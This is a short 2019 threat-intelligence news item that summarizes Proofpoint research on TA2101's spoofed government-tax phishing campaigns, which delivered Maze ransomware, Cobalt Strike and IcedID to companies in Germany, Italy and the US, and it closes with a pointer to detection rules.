Delaware, USA – November 15, 2019 – A relatively new threat actor sends spam emails disguised as notifications from government agencies to infect victims with penetration testing frameworks, ransomware, and banking trojans. Proofpoint researchers found that the first campaign the attackers carried out only a month ago, its main targets were IT services companies in Germany, and the campaign itself was not large-scale. Emails from TA2101 pretended to be notifications about tax refund sent by the German Federal Ministry of Finance. The attachment was a Microsoft Word document with malicious macro running PowerShell scripts to install Maze ransomware and Cobalt Strike pentesting tool. A week later, the attackers repeated the trick, and at the end of October conducted a similar campaign in Italy, changing the sender to the Italian Ministry of Taxation. The main targets of this campaign were manufacturing companies, and only ransomware was installed by malicious scripts. Starting with this campaign, TA2101 changed the lure document convincing the user to enable scripts. Now the spam emails allegedly contain RSA SecurID key and victims can open them only by “desktop or laptop versions of Microsoft Word”.
In November, adversaries launched two campaigns against German business and IT services companies, and on November 12 launched the first campaign in the United States that targeted the Healthcare sector. Unlike European campaigns, the threat actor used IcedID trojan as a final payload. TA2101 is rapidly evolving and experimenting with various malware and preferred victims. Cybercriminals successfully use social engineering and spoof legitimate-looking email addresses, persuading victims to open malicious attachments and enable scripts. You can detect the abuse of PowerShell to deliver malware using the rules available on the Threat Detection Marketplace: https://tdm.socprime.com/